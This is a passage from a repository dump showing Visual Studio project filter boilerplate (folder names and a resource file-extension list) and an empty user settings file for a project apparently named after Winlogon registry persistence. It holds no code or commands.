14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/winlogon-registry/winlogon-registry.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------